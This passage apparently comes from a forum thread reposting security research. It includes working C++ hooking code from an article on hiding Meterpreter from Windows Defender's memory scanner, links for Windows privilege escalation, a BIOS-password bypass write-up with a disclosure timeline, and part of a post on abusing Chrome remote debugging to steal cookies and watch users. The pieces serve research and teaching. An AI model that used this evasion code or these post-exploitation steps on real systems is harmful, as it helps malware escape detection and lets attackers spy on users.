LPHOOK_RESULT installHook(LPVOID hookFunAddr, LPVOID jmpAddr, SIZE_T len)
{
    if (len < 5) {
        return NULL;
    }

    DWORD currProt;
    LPBYTE originalData = (LPBYTE)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, len);
    CopyMemory(originalData, hookFunAddr, len);

    LPHOOK_RESULT hookResult = (LPHOOK_RESULT)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, sizeof(HOOK_RESULT));
    hookResult->hookFunAddr = hookFunAddr;
    hookResult->jmpAddr = jmpAddr;
    hookResult->len = len;
    hookResult->free = FALSE;
    hookResult->originalData = originalData;

    VirtualProtect(hookFunAddr, len, PAGE_EXECUTE_READWRITE, &currProt);
    memset(hookFunAddr, 0x90, len);

    SIZE_T relativeAddress = ((SIZE_T)jmpAddr - (SIZE_T)hookFunAddr) - 5;
    *(LPBYTE)hookFunAddr = 0xE9;
    *(PSIZE_T)((SIZE_T)hookFunAddr + 1) = relativeAddress;

    DWORD temp;
    VirtualProtect(hookFunAddr, len, currProt, &temp);

    printf("Hook installed at address: %02uX\n", (SIZE_T)hookFunAddr);
    return hookResult;
}

BOOL restoreHook(LPHOOK_RESULT hookResult)
{
    if (!hookResult)
        return FALSE;

    DWORD currProt;
    VirtualProtect(hookResult->hookFunAddr, hookResult->len, PAGE_EXECUTE_READWRITE, &currProt);
    CopyMemory(hookResult->hookFunAddr, hookResult->originalData, hookResult->len);

    DWORD dummy;
    VirtualProtect(hookResult->hookFunAddr, hookResult->len, currProt, &dummy);

    HeapFree(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, hookResult->originalData);
    HeapFree(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, hookResult);
    return TRUE;
}
```

When our Metasploit payload calls the CreateProcess function, our custom hookCreateProcessInternalW method will be executed instead. hookCreateProcessInternalW calls createProcessNinja on another thread to hide the Meterpreter payload.
```cpp
BOOL WINAPI hookCreateProcessInternalW(HANDLE hToken, LPCWSTR lpApplicationName, LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles,
    DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation, PHANDLE hNewToken)
{
    BOOL res = FALSE;
    restoreHook(createProcessHookResult);
    createProcessHookResult = NULL;
    printf("My createProcess called\n");

    LPVOID options = makeProcessOptions(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes,
        lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory,
        lpStartupInfo, lpProcessInformation, hNewToken);
    HANDLE thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)createProcessNinja, options, 0, NULL);

    printf("[!] Waiting for thread to finish\n");
    WaitForSingleObject(thread, INFINITE);
    GetExitCodeThread(thread, (LPDWORD)&res);
    printf("[!] Thread finished\n");

    CloseHandle(thread);
    createProcessHookResult = installHook(CreateProcessInternalW, hookCreateProcessInternalW, 5);
    return res;
}
```

Notice that setPermissions is used to set the PAGE_NOACCESS permission on our memory before the call to CreateProcess is finally made.

```cpp
BOOL createProcessNinja(LPVOID options)
{
    LPPROCESS_OPTIONS processOptions = (LPPROCESS_OPTIONS)options;
    printf("Thread Handle: %02lX\n", metasploitThread);

    if (SuspendThread(metasploitThread) != -1) {
        printf("[!] Suspended thread \n");
    }
    else {
        printf("Couldnt suspend thread: %d\n", GetLastError());
    }

    setPermissions(allocatedAddresses.arr, allocatedAddresses.dwSize, PAGE_NOACCESS);

    BOOL res = CreateProcessInternalW(processOptions->hToken, processOptions->lpApplicationName,
        processOptions->lpCommandLine, processOptions->lpProcessAttributes, processOptions->lpThreadAttributes,
        processOptions->bInheritHandles, processOptions->dwCreationFlags, processOptions->lpEnvironment,
        processOptions->lpCurrentDirectory, processOptions->lpStartupInfo, processOptions->lpProcessInformation,
        processOptions->hNewToken);

    Sleep(7000);

    if (setPermissions(allocatedAddresses.arr, allocatedAddresses.dwSize, PAGE_EXECUTE_READWRITE)) {
        printf("ALL OK, resuming thread\n");
        ResumeThread(metasploitThread);
    }
    else {
        printf("[X] Coundn't revert permissions back to normal\n");
    }

    HeapFree(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, processOptions);
    return res;
}
```

A brief sleep (seven seconds in the code above) is taken to let the Windows Defender scan complete before the permissions of the Metasploit modules are reverted back to normal. This was sufficient during testing, however it may take longer on other systems or processes. Also during testing it was found that some processes didn’t trigger Windows Defender even though they made calls to those WinAPI functions. Those processes are:

explorer.exe
smartscreen.exe

So another potential bypass would be to simply inject your Meterpreter payload into either process and you would bypass Windows Defender’s memory scanner. Although unconfirmed, we believe this may have been a performance optimization, as those two processes often call CreateProcess. A custom Metasploit extension called Ninjasploit was written to be used as a post-exploitation extension to bypass Windows Defender. The extension provides two commands, install_hooks and restore_hooks, which implement the memory modification bypass previously described.
The extension can be found here: https://github.com/FSecureLABS/Ninjasploit

Conclusion

In recent years Windows Defender has made some great improvements, yet as this testing showed, with relatively little effort the static analysis and even runtime analysis can be bypassed. We showed how payload encryption and common process injection techniques could be used to bypass Windows Defender. And while more advanced runtime analysis provided an additional hurdle, it was still relatively straightforward to bypass by abusing the limitations of real-time memory scanning. Although not the focus of this post, it would have been interesting to perform the same testing against next-gen file classification as well as modern EDR solutions, as these may have provided additional challenges.

Special thanks to Luke Jennings and Arran Purewal for all their help and support during this research project.

References

https://github.com/Veil-Framework/Veil
https://github.com/nullsecuritynet/tools/tree/master/binary/hyperion/source
https://github.com/FSecureLABS/Ninjasploit

Sursa: https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/
-
Windows-Privilege-Escalation-Resources

Compilation of Resources from TCM's Windows Priv Esc Udemy Course

General Links

Link to Website: https://www.thecybermentor.com/
Link to course: https://www.udemy.com/course/windows-privilege-escalation-for-beginners/
Link to discord server: https://discord.gg/RHZ7UF7
HackTheBox: https://www.hackthebox.eu/
TryHackMe: https://tryhackme.com/
TryHackMe Escalation Lab: https://tryhackme.com/room/windowsprivescarena

Introduction

Fuzzy Security Guide: https://www.fuzzysecurity.com/tutorials/16.html
PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
Absoloom's Guide: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Sushant 747's Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

Gaining a Foothold

msfvenom: https://netsec.ws/?p=331

Exploring Automated Tools

winpeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Windows Priv Esc Checklist: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
Sherlock: https://github.com/rasta-mouse/Sherlock
Watson: https://github.com/rasta-mouse/Watson
PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
JAWS: https://github.com/411Hall/JAWS
Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Metasploit Local Exploit Suggester: https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
Seatbelt: https://github.com/GhostPack/Seatbelt
SharpUp: https://github.com/GhostPack/SharpUp

Escalation Path: Kernel Exploits

Windows Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits
Kitrap0d Info: https://seclists.org/fulldisclosure/2010/Jan/341
MS10-059: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

Escalation Path: Passwords and Port Forwarding

Achat Exploit: https://www.exploit-db.com/exploits/36025
Achat Exploit (Metasploit): https://www.rapid7.com/db/modules/exploit/windows/misc/achat_bof
Plink Download: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Escalation Path: Windows Subsystem for Linux

Spawning TTY Shell: https://netsec.ws/?p=337
Impacket Toolkit: https://github.com/SecureAuthCorp/impacket

Impersonation and Potato Attacks

Rotten Potato: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
Juicy Potato: https://github.com/ohpe/juicy-potato
Groovy Reverse Shell: https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
Alternative Data Streams: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

Escalation Path: getsystem

getsystem Explained: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

Escalation Path: Startup Applications

icacls Docs: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

Escalation Path: CVE-2019-1388

ZeroDayInitiative CVE-2019-1388: https://www.youtube.com/watch?v=3BQKpPNlTSo
Rapid7 CVE-2019-1388: https://www.rapid7.com/db/vulnerabilities/msft-cve-2019-1388

Capstone Challenge

Basic Powershell for Pentesters: https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters
Mounting VHD Files: https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
Capturing MSSQL Creds: https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478

Sursa: https://github.com/Gr1mmie/Windows-Privilege-Escalation-Resources/blob/master/README.md
-
Defeating a Laptop's BIOS Password

We found a laptop laying around the office that had a BIOS password enabled. On top of that, the laptop had secure boot turned on. We wanted to run an OS that was not signed with Microsoft's keys, so we really needed a way to get into the setup utility. Some minor details have been changed to obfuscate the manufacturer and the model of the target laptop.

Table of Contents

Table of Contents
UEFI Primer
Glossary
The Boot Process
Firmware Filesystem
Flash Black Magic
Dumping the Flash
Parsing the Flash
Messing with NVRAM
Breaking and Entering
Loading into Setup
Modifying Firmware In-Memory
GUID Hell
Emulated EEPROM
Boot-Time Shenanigans
"The Incident"
Enabling JTAG
Locating the Options
Editing NVRAM Variables in Flash
Fixing "The Incident"
Orienting Ourselves
Executing Code
Obligatory blurb

UEFI Primer

Glossary

SEC - Security
PEI - Pre-EFI Initialization
DXE - Driver eXecution Environment
PEI module/DXE driver/UEFI application - Microsoft PE formatted files containing firmware code
Protocol - An instance of a struct identified by a GUID
PCH - Platform Controller Hub

The Boot Process

Even today's modern 64-bit CPUs begin execution in 16-bit mode. In UEFI, this is called the SEC phase. The SEC phase configures a minimal set of CPU registers and then switches the CPU into 32-bit mode. This mode switch marks the end of the SEC phase and the beginning of the PEI phase. In þe days of olde the SEC phase also acted as the root of trust for the system, but nowadays that role is assigned to the PCH. The PCH verifies the firmware for the SEC and PEI phases before the CPU begins executing any code. The PEI phase configures some non-CPU platform components and optionally verifies the integrity of the DXE phase's code. After verification, the PEI phase switches the CPU into 64-bit mode and starts the DXE phase. The DXE phase contains all of the drivers and applications that run before your OS boots, including your OS's bootloader.
Some of these drivers persist even after your OS has booted.

Firmware Filesystem

UEFI defines its own filesystem format for use in flash images. A flash image will contain one or more firmware volumes, and each volume will contain one or more firmware files. Files are identified by a GUID rather than by a name, although some file types define a way to optionally provide a name. A file can also be a container for another volume, which enables nested volumes (i.e. one volume within another). Nested volumes are commonly used to support volume compression.

Flash Black Magic

Dumping the Flash

At heart, PCs are just large, powerful, embedded devices, and like most embedded devices they have flash chips that we can dump and rewrite. The flash chip is usually the chip with the bulkiest package on the board. We quickly identified the flash chip on our laptop's motherboard, and promptly attached it to a SPI flash programmer with some clips.

Parsing the Flash

The flash's contents were formatted as an Intel image and could readily be parsed by UEFITool. Intel flash images are divided into several regions. However, the only region that we cared about was the BIOS region. The BIOS region consists of several firmware filesystem volumes and an NVRAM variable storage area. We could have just found the file responsible for showing the setup screen to the user and patched out the password check, but that wasn't possible on this laptop because hardware-based firmware security was enabled. In the image above, areas marked in red are protected by Intel BootGuard. Before the CPU can execute any instructions, the hash of the red areas is computed and then checked against a signature stored in the flash somewhere; the hash of the RSA public key used to verify that signature is fused into the PCH during the OEM's manufacturing process. The areas marked in cyan are protected by the OEM's code verification mechanism.
The OEM has to implement its own verification mechanism on top of BootGuard, because BootGuard only protects the SEC and PEI phases. The DXE phase also needs to be protected from modification. In most implementations, the cyan areas are hashed, and that hash is matched against a hash stored in a file in the red area. Since everything in the red area is already protected by BootGuard, another signature is not needed. However, no NVRAM variables can be protected, because they're designed to be modified by end-users.

Messing with NVRAM

None of us had ever seen the secure boot enable flag or the BIOS password stored anywhere except inside of an NVRAM variable. So the first thing that we wanted to try was completely clearing all of the NVRAM variables and having the board use its default values for everything. If we were lucky, secure boot would be disabled and the BIOS password would be gone. However, when we tried to boot the board after clearing the variable store, we were presented with the following error message:

12B4: Bad Checksum of Sec Settings in NVRAM variable.

We searched for a portion of that string in the dump, and then loaded the DXE driver containing it into IDA. Once it was loaded, we followed the x-refs to reach the code that referenced it. It seemed like it would attempt to get a handle to a protocol with a certain GUID, and if it was not able to, it would get a handle to the logging protocol and send it that error message. We tracked down the driver that implemented the desired protocol and looked at all of the NVRAM variables it attempted to access. One of them had SecConfig in its name, so we tried clearing all NVRAM variables except for that one and hoped for the best. The board booted successfully and secure boot was disabled, :D! The BIOS password, however, was still enabled... :(. It couldn't have been stored in the SecConfig variable, because after looking at its contents we determined that it was just a bunch of enable/disable flags.
There was not enough data in the variable to contain either the password itself or the hash of the password. From these findings, we concluded that the BIOS password had to be stored somewhere other than NVRAM, and that it could have even been stored off-flash on an entirely different chip. Breaking and Entering Loading into Setup It was possible to return to the boot device selection menu after you had booted into a flash drive by exiting the UEFI app that was running (in this case a copy of the UEFI shell). However, when this was done the option to enter the setup menu from within the boot menu would disappear. We looked at the NVRAM boot entry for the setup menu and saw that it was booting into a UEFI app with a GUID of 2AD48FB3-2E28-42F2-88D5-A73EC922DCBA. By searching for that GUID in UEFITool, we found the app's executable in the firmware. We extracted it and put it on our flash drive. We tried executing the app from within our shell, but for some reason the executable was marked as a DXE driver instead of a UEFI app. We managed to get it to execute by using the load command instead of running it directly, but even when we started it that way we were presented with the password prompt. Modifying Firmware In-Memory We wanted to track down the driver that handled the password checking logic so that we could patch it in memory. The patch we wanted to make would make it think that no password was set. It wouldn't be a permanent fix, but if it worked it would allow us to get into the setup menu. With nothing else to go on, we looked through the names of all of the DXEs in the firmware image. One that stood out to us was BpwManager because we thought that Bpw might have been short for BIOS password. We loaded it into IDA, and then looked at all of its strings. We knew we had the right driver when we saw 12AE: Sys Security - BIOS password entry failure count exceeded in the string list. The driver registered one protocol which consisted of several function pointers. 
We looked at all of the places that the setup utility used that protocol and found one place where we believed it was determining whether or not a BIOS password was enabled. It called one of the functions provided by the protocol, and if the return value had its lowest bit set, it would do something with the string Enabled, otherwise it would do something with the string Disabled.

```cpp
((void (__fastcall *)(BpwProtocol *, _QWORD, char *))bpwProtocol->GetBPWFlags)(bpwProtocol, 0i64, &bpwFlags);
v13 = L"Enabled";
if ( !(bpwFlags & 1) )
    v13 = L"Disabled";
```

We assumed this was related to the code for displaying the menu entry for the BIOS password, and that the function it was calling was some sort of GetFlags() function. The code for that function just read in a value from a memory address and returned it. We used our UEFI shell to edit the flag value in memory and set it to 0, and then we tried loading the setup utility again. It worked! We were even able to go to the security tab and unset/reset the BIOS password! Sadly, after we rebooted the laptop and tried to enter the setup utility normally, it still prompted us for the old password :(. Something weird was going on.

GUID Hell

Emulated EEPROM

Almost every function in the BpwManager driver called into a protocol with a GUID of 9FFA2362-7344-48AA-8208-4F7985A71B51. We used UEFITool's search-by-GUID function to find all references to that protocol. One result in particular piqued our interest: it was a driver named EmuSecEepromDxe. We loaded it into IDA and confirmed that this was the driver registering the protocol in question. The protocol consisted of three function pointers, one of which did nothing except return an error value.
Based on the Hex-Rays output of the two remaining functions and how they were used in the BpwManager driver, we constructed this structure to describe the protocol:

```cpp
struct EmuSecEepromProtocol {
public:
    EFI_STATUS (*eepromRead)(EmuSecEepromProtocol *this, __int64 eepromBankID, __int64 byteIndex, unsigned char *b);
    EFI_STATUS (*eepromWrite)(EmuSecEepromProtocol *this, __int64 eepromBankID, __int64 byteIndex, unsigned char b);
    EFI_STATUS (*returnError)();
};
```

We determined that the emulated EEPROM was divided into several sections, which we called banks. There were 8 banks, containing 0x80 bytes each. Every eepromBankID referred to two contiguous banks, with the second one being used for byte indices above 0x80. We determined that the information that was important to the BpwManager DXE was stored in bank ID 0x57. We wrote a quick UEFI app to try and read out all 0x100 bytes from that bank ID, but every call we made to eepromRead returned an error code for the first 0x80 bytes. That meant we were unable to read data from the first bank in the group of two. We tracked down where that error number was referenced in IDA. Reading through the code, we discovered that bank ID 0x5C was an array of access permissions for all of the banks. Every time something tried to read or write from a bank, it would check a byte in bank ID 0x5C based on the bank number (not ID number) being accessed. Bank ID 0x57 corresponded to bank numbers 6 and 7, and sure enough, bank number 6 had permissions set to not allow reads or writes and bank number 7 allowed reads. This explained why we were able to read bytes from the second half but not from the first. We attempted to change the permission byte of bank number 6, but that gave us another error. We discovered that there was another bit in the permission byte that locked out further permission changes. We also tried patching out the jump instructions that led to the error return code, but that didn't work either.
Now we knew that the check was also happening somewhere outside of the driver. To track it down, we followed the path of all of the read/write requests and found that they eventually ended up at the CPU IO EFI protocol. The actual operations were happening off-CPU somewhere. Boot-Time Shenanigans We guessed that all emulated EEPROM operations were actually being handled by the embedded controller, but we didn't spend that much time searching for what was actually handling them; it was not that important for us to know. Almost every other chip on the board was in a BGA package that we didn't know the pinout for, so it would have been impractical to dump or reflash whatever chip it was stored on. We knew at some point during boot, the permissions had to be set to allow at least some operations, because the prompt asking you to type the password needed something to compare against and the setup utility had to have the ability to change the password. The hint that we needed was that the setup button would still be present in the boot menu if you booted into a built-in app such as the diagnostics splash screen, then exited it. However, like we noted earlier, if you booted into an external app, such as a UEFI shell on a flash drive, the "Enter Setup" button would disappear until the next reboot. We searched the dump for the names of one of the built-in apps to try and see if we could redirect it to the normally inaccessible, but built-in, UEFI shell. It turns out they're completely standard NVRAM UEFI boot entries. The attributes field of boot entries has a flag that means it's for an application, and instead of a path to a file to run, the variable contains the GUID of a built-in app. We modified one of these boot entries to point to the built-in shell, and then tried booting into it. It worked, and now we were in business! "The Incident" We read out the permission bytes for all of the banks and saw that they allowed all permissions on every bank. 
We then identified where the hash of the password was located within the EEPROM and wrote 0s to it. One of us remembered seeing that if the BpwManager read all 0s for the password's hash, it would think that no password was set.

Turns out, we were wrong. Really wrong. When we rebooted we were able to get into the boot menu, but choosing any boot entry was met with this error:

01240: Bad BPW data, stop boot.

The error was only displayed for around 3 seconds, after which the system immediately powered off. Instead of patching the hash directly in the emulated EEPROM, we really should have applied the same patch we used before to bypass the password prompt, gotten into the setup menu, and changed the password from there. Hindsight is 20/20. We were a little too excited about all of the permissions being enabled.

Enabling JTAG

At this point, the only way any of us could think of to save the board was JTAG. Even though the board had no JTAG connector, most Intel chipsets support JTAG-over-USB. Intel calls it the direct connect interface, or DCI, and there are two flavors: DbC (USB DebugClass) and OOB (out-of-band). OOB implements a completely different wire protocol on the USB pins and requires a special adapter that you can only get by signing an NDA with Intel. That left DbC; it's like USB On-the-Go, but in reverse. You use a crossover USB 3.0 A-A cable to connect to the board you're trying to debug, and it will enumerate as a USB device. To interface with that USB device, you can use Intel System Studio, which can be downloaded for free without an NDA. It gives you a normal-ish debugger interface.

Locating the Options

We needed to figure out how to enable DCI. On most motherboards, the setup utility you can access only shows a small subset of the available configuration options. For some reason, the other options are usually still compiled in, even though they'll always be hidden.
Almost every interface you see in UEFI is based on what the specification calls HII, or human interface infrastructure. HII interfaces are designed in a language called VFR (visual form representation) and are compiled into IFR (intermediate form representation). All we needed to do was find the DXE that displayed the options, and then extract the IFR from it. Once we had the IFR, we could disassemble it to make it human-readable. Fortunately for us, someone had already done the hard work of writing a tool to do all of those things. We used LongSoft's fork of Universal-IFR-Extractor. To find the correct DXE, we just searched for the name of one of the options in the setup utility.

The output of the IFR extractor is a disassembled version of the bytecode, but it's still easy enough to understand. There are a number of VarStore objects defined like:

```
VarStoreEFI: VarStoreId: 0x5 [8D6355D7-9BD1-44FF-B02F-925BA85A0FAC], Attrubutes: 3, Size: 572, Name: PchSetup
```

Each VarStore corresponds to an NVRAM variable, given by its name and GUID. The ID is used to reference it in options. Options are defined like:

```
One Of: DCI enable (HDCIEN), VarStoreInfo (VarOffset/VarName): 0x8, VarStore: 0x5, QuestionId: 0x2D8, Size: 1, Min: 0x0, Max 0x1, Step: 0x0
  One Of Option: Disabled, Value (8 bit): 0x0 (default)
  One Of Option: Enabled, Value (8 bit): 0x1
End One Of {29 02}
```

The DCI enable option is stored in VarStore 5 at byte offset 8 and is 1 byte long. Setting that byte to 0 means disabled, and setting it to 1 means enabled. These are all of the options that we changed:

- DCI enable (HDCIEN) -> Enabled
- Debug Interface -> Enabled
- Debug Interface Lock -> Disabled
- Enable/Disable IED (Intel Enhanced Debug) -> Enabled

Editing NVRAM Variables in Flash

At this point, since we were unable to boot into anything except the boot menu, our only option for editing those NVRAM variables was to write to them directly using our external flash programmer.
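Putting the pieces together: the IFR gives the option's VarOffset within the variable, and UEFITool gives the file offset where the variable's value starts in the dump. A sketch of the resulting one-byte patch (the offsets and helper are hypothetical; each variable in flash has a header that you must already have skipped past to obtain the value offset):

```python
def patch_nvram_option(dump: bytes, value_offset: int, var_offset: int,
                       new_value: int) -> bytes:
    """Return a copy of a flash dump with one option byte changed.

    value_offset: file offset where the variable's *value* starts
                  (past the variable header, as located with UEFITool).
    var_offset:   the option's VarOffset from the IFR (0x8 for HDCIEN above).
    """
    pos = value_offset + var_offset
    return dump[:pos] + bytes([new_value]) + dump[pos + 1:]

# Hypothetical example: enable DCI (VarOffset 0x8, value 0x01) in a PchSetup
# variable whose value starts at file offset 0x1000 of the dump.
dump = bytes(0x2000)
patched = patch_nvram_option(dump, 0x1000, 0x8, 0x01)
assert patched[0x1008] == 0x01 and len(patched) == len(dump)
```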
We retrieved a fresh dump from the flash chip so we would only modify the current state rather than revert it to an earlier state and potentially cause even more things to break. We found the offsets of the variables in the flash using UEFITool. There is a header on each variable, so you need to skip past it to get to the actual value of the variable. After editing all of the variables that were needed to change the options, we reloaded the dump in UEFITool to verify that we hadn't accidentally corrupted anything and that the values of the variables had actually changed. After that, we re-flashed it, hooked up the crossover cable, powered on the board, and hoped for the best. Luckily for us, it worked! This was our first time getting JTAG on an Intel-based computer, and it was very exciting—especially given how easy it turned out to be.

Fixing "The Incident"

Orienting Ourselves

We booted into the boot menu and then broke into the debugger. We had no idea what portion of code we had broken into, much less where any of the code or data we were interested in was located. Unfortunately, we hadn't thought to save the load addresses of any of the relevant DXE modules before "the incident" occurred and made the board unbootable, so we had nothing to go on. The debugger had a built-in command that would list all of the loaded DXE modules; however, it needed the address of the UEFI system table, and the automatic scan for it failed. In most UEFI binaries built using EDK-II, the system table gets stored in a global variable when the driver/app's entry point function executes. We dumped a handful of bytes from the address RIP was at, and then searched for those bytes in UEFITool to determine which module we were currently executing code in. We loaded that module into IDA and rebased the database to the module's load address.
We figured out the module's load address by searching the IDA database for the bytes we pulled out earlier and computing an offset based on the value of RIP. Now that we had a nicely aligned IDA database, we could easily obtain the address of the global variable that contained a pointer to the system table. We retrieved the address of the system table from that variable and supplied it to the debugger. Now, when we gave it the command to list DXE modules, it actually gave us a list. The output was similar to:

```
ModuleID Base               Size       Name
00001    0x00000000D5A32000 0x00018460 <no_debug_info>
00002    0x00000000D5A4B000 0x00003B80 <no_debug_info>
00003    0x00000000D5A4F000 0x00001200 <no_debug_info>
00004    0x00000000D5A51000 0x00002F40 <no_debug_info>
00005    0x00000000D5A54000 0x00000540 <no_debug_info>
00006    0x00000000D5A55000 0x00001620 <no_debug_info>
...
```

Annoyingly, the debugger would not give us a module's name, or even its GUID, without debug info loaded. However, we could use the size of each module to narrow down the list of possible base addresses; UEFITool provided the size of each module. We examined the memory located at each of the remaining base addresses and compared it to the data that we extracted from the firmware dump to figure out which base address corresponded to each module we were interested in.

Executing Code

We pondered the best way to execute arbitrary code for a while. We realized that all of the code we would need to run would cause a state change that would persist across reboots. That meant that we would not have to return execution to the firmware; after our code had run, we could just reboot the board. We looked back at the code inside of BpwManager and determined that there was a two-byte checksum that we hadn't erased. We theorized that zeroing that checksum would allow the board to boot. To write the zeros, we simply set RIP to the address of the eepromWrite function and set all other registers to supply the correct function arguments.
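A sketch of the register setup this implies, assuming the Microsoft x64 calling convention that UEFI uses on x86-64 (rcx/rdx/r8/r9 carry the first four arguments of eepromWrite). All concrete addresses and the checksum offset below are hypothetical placeholders, not values from the real firmware:

```python
# Driving eepromWrite from the debugger: rcx = this, rdx = eepromBankID,
# r8 = byteIndex, r9 = byte value. Addresses/offsets here are hypothetical.

EEPROM_WRITE_ADDR = 0xD5A32460   # hypothetical address of eepromWrite
PROTOCOL_PTR      = 0xD5AFF000   # hypothetical EmuSecEepromProtocol instance
BPW_BANK_ID       = 0x57
CHECKSUM_OFFSET   = 0xFE         # hypothetical offset of the 2-byte checksum

def write_call_regs(byte_index: int, value: int) -> dict:
    """Register file to apply before resuming execution at eepromWrite."""
    return {
        "rip": EEPROM_WRITE_ADDR,
        "rcx": PROTOCOL_PTR,      # this
        "rdx": BPW_BANK_ID,       # eepromBankID
        "r8":  byte_index,        # byteIndex
        "r9":  value,             # byte to write
    }

# One call per checksum byte; the board is reset after both writes land.
calls = [write_call_regs(CHECKSUM_OFFSET + i, 0x00) for i in range(2)]
assert [c["r8"] for c in calls] == [0xFE, 0xFF]
```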
We put a breakpoint on the return instruction of the eepromWrite function so that execution would not return to firmware code. Returning to firmware code probably would have caused a crash, because by modifying the registers we had put the board into an undefined state. After overwriting the two bytes and resetting the board, the BIOS password was finally gone! We tried setting our own password from the setup utility just to make sure that it was actually gone and we had full control. That also worked.

Obligatory blurb

Would you like to reverse engineer and exploit embedded systems? Ones that might even be able to fly? We're hiring! You can view our current open positions at https://www.skysafe.io/jobs. If you don't see a position that looks right for you, feel free to send us a resume. We may have openings that we're not actively hiring for.

Timeline

2019-11-14 - Sent email to vendor security contact. Vendor given a 90-day deadline.
2019-11-20 - No response to initial outreach. Sent another email to vendor and CC'd the UEFI USRT.
2019-11-20 - UEFI USRT acknowledged receipt of emails.
2020-01-30 - Vendor replied and asked what our disclosure plans were.
2020-01-30 - We replied that we were planning on publishing our blog post publicly on 2020-02-12 and offered the vendor a 14-day extension. We included a draft copy of this blog post with this reply.
2020-02-01 - Vendor asked if we were able to reproduce the issues on any other products in the same product line.
2020-02-03 - We replied that we had not attempted to reproduce it on any other products, but all products that use the EmuSecEeprom driver may be vulnerable.
2020-02-04 - Vendor asked for more details on how the UEFI shell was launched.
2020-02-19 - We replied with an explanation of how the EFI_LOAD_OPTION struct works when the LOAD_OPTION_CATEGORY_APP attribute is set.
2020-02-20 - We let the vendor know that we were planning to publish the blog post on 2020-02-21.
2020-02-20 - The vendor said they had been able to reproduce most of the findings and were planning on issuing an advisory. They were having trouble reproducing one of the findings and asked for a full SPI flash image.
2020-02-20 - We sent the vendor a full SPI flash image that demonstrated the issue.
2020-02-24 - Blog post published.

Sursa: https://github.com/skysafe/reblog/blob/master/0000-defeating-a-laptops-bios-password/README.md
-
In this video we'll see how to execute code before the entry point of the application and before the main function, and confuse some debuggers along the way. Let's begin.

PoC code: https://github.com/reversinghub/TLS-PoC

Analysis tools:
- Immunity debugger
- CFF Explorer
- LordPE
- IDA Pro
- Visual Studio IDE

---------------------------------------------------------------------------------------------------

Follow us on
Twitter: https://twitter.com/reversinghub
Github: https://github.com/reversinghub

If you liked this video and you want to learn hands-on how to analyse malware, with real samples and practical exercises, find us on Udemy: https://www.udemy.com/course/reverse-...

Thank you!
-
Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely

Posted on Apr 28, 2020
#red #cookies #book #ttp #post-exploitation

Chrome's remote debugging feature enables malware post-exploitation to gain access to cookies. Root privileges are not required. This is a pretty well-known and commonly used adversarial technique - at least since 2018, when Cookie Crimes was released. However, remote debugging also allows observing user activities and sensitive personal information (aka spying on users) and controlling the browser from a remote computer. The screenshot below shows a simulated attacker controlling the victim's browser and navigating to chrome://settings to inspect information.

This is what we will discuss and explore more in this post, and it is a summary of one of the techniques described in the book "Cybersecurity Attacks - Red Team Strategies". At a high level, remote debugging is a development/test feature which, for some reason, made it into the ordinary retail version of Chrome. Since it's a "feature" and requires an adversary/malware to be present on the machine (post-exploitation), Chromium likely won't be changing anything. Hence this post will highlight important detections that anti-virus products and blue teams should put in place to have telemetry for catching potential misuse or attacks and protecting users. Hopefully this post can help raise additional awareness to improve detections and countermeasures. But, first things first...

Entering Cookie Crimes

A very powerful cookie stealing technique was described by mangopdf in 2018 with "Cookie Crimes". Chrome offers a remote debugging feature that can be abused by adversaries and malware post-exploitation to steal cookies (it doesn't need root permissions). Cookie Crimes is now also part of Metasploit - cool stuff! When I first saw this, it was super useful right away during the post-exploitation phase of red teaming ops on macOS to Pass the Cookie.
At that time I also started experimenting more with the remote debugging features of Chrome, with some rather scary outcomes - and there is probably a lot more to figure out.

Automating and remote controlling Chrome

Besides stealing cookies, the feature allows an attacker to remotely control the browser, observe browsing sessions, and gain access to sensitive user settings (like saved credit card numbers in the browser, etc.). This is what we are going to discuss now a bit more.

Disclaimer

This information is for research and educational purposes, in order to learn about attacks and help build detections and countermeasures. Security and penetration testing requires authorization from proper stakeholders.

Headless mode

Chrome supports running headless in the background without the user noticing that it is running. Examples here are given for PowerShell, but feel free to adjust to whatever shell/OS you are using. To run Chrome headless without a visible UI, specify the --headless option, as follows:

```powershell
Start-Process "Chrome" "https://www.google.com --headless"
```

This starts Chrome without the UI. To ensure a smooth start, specify --no-first-run. By running Get-Process, you can observe the newly created process as well. To terminate all Chrome instances, simply run:

```powershell
Get-Process chrome | Stop-Process
```

